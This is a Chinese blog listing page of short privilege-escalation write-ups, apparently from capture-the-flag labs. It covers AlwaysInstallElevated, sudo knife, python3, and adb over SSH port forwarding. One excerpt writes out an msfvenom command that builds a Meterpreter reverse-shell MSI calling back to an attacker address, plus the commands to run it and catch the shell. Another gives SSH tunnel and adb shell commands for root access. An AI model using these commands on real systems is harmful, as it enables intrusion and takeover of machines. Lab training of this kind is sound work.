提权
weixin_47156475
这个作者很懒,什么都没留下…
展开
-
利用AlwaysInstalledElevated的漏洞提权
提权我们可以利用AlwaysInstalledElevated的提权漏洞,那么创建一个msi文件,命令如下:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.15.156 lport=5555 -f msi > shell.msi在123.exe的shell中执行 execute -H -f shell.msi再次开启一个新的端口监听:use exploit/multi/handlerset payload php/me原创 2021-08-14 09:59:25 · 118 阅读 · 0 评论 -
使用sudo的knife进行提权
使用knife进行提权原创 2021-08-13 22:31:04 · 118 阅读 · 0 评论 -
利用python3进行提权
提权的话,发现不能使用sudo提权,但是可以使用python进行提权原创 2021-08-13 22:25:53 · 1388 阅读 · 0 评论 -
使用端口转发+安卓adb进行提权
kali中的下载命令如下:apt-get install android-tools-adb接下来尝试从 ssh 端口转发,并在端口 5555 上使用连接ssh时的登录密码命令如下:ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222然后使用adb连接5555端口,命令如下:adb connect 127.0.0.1:5555最后使用shell:adb -s 127.0.0.1:5555 shell至此,提权完成参考图片如下:原创 2021-08-13 17:02:05 · 2136 阅读 · 1 评论 -
sudo nopasswd+代码审计+脚本编写提权
sudo一下,看看是否有什么可以提取权限的方法,并且查看一下可以提权的文件经过代码审计,发现可以构造一个脚本,提取权限在/home/development目录下有一个ticket.md,我们可以修改这个脚本如下:然后使用sudo运行这个脚本,即可返回root用户的连接成功获取root权限,并且获得root.txt的内容...原创 2021-08-13 16:48:49 · 141 阅读 · 0 评论